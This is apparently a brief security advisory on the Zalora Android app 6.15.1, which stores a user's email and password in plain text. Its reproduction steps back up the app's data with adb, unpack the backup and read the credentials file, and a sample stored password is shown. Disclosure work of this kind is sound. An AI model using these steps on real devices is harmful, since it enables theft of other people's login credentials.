Author: Ender Phan

Description: The Zalora application 6.15.1 for Android stores confidential information insecurely on the system (i.e. plain text), which allows a non-root user to find out the username/password of a valid user via /data/data/


#Application: Zalora
#Platform: Android
#Version: 6.15.1 (latest)
#Severity: Medium
#Impact: None-root user can read the password in clear-text and login to the application.


1. Backups application data into Local PC
adb backup -f ~/zalora.ab -noapk

2. Converts file "zalora.ab" into tar file(file contains backup data of
java -jar abe.jar unpack ~/zalora.ab zalora.tar ""

3. Extracts tar file.
tar -xvf zalora.tar

4. After the extraction, goes and checks the data in the directory located in apps/

5. Looks for sensitive data. The password stored in /shared_prefs/login_data.xml in plain-text

<?xml version='1.0' encoding='utf-8' standalone='yes' ?>
    <string name="login_data">{&quot;password&quot;:&quot;P4ssw0rd123&quot;,&quot;email&quot;:&quot;[email protected]&quot;}</string>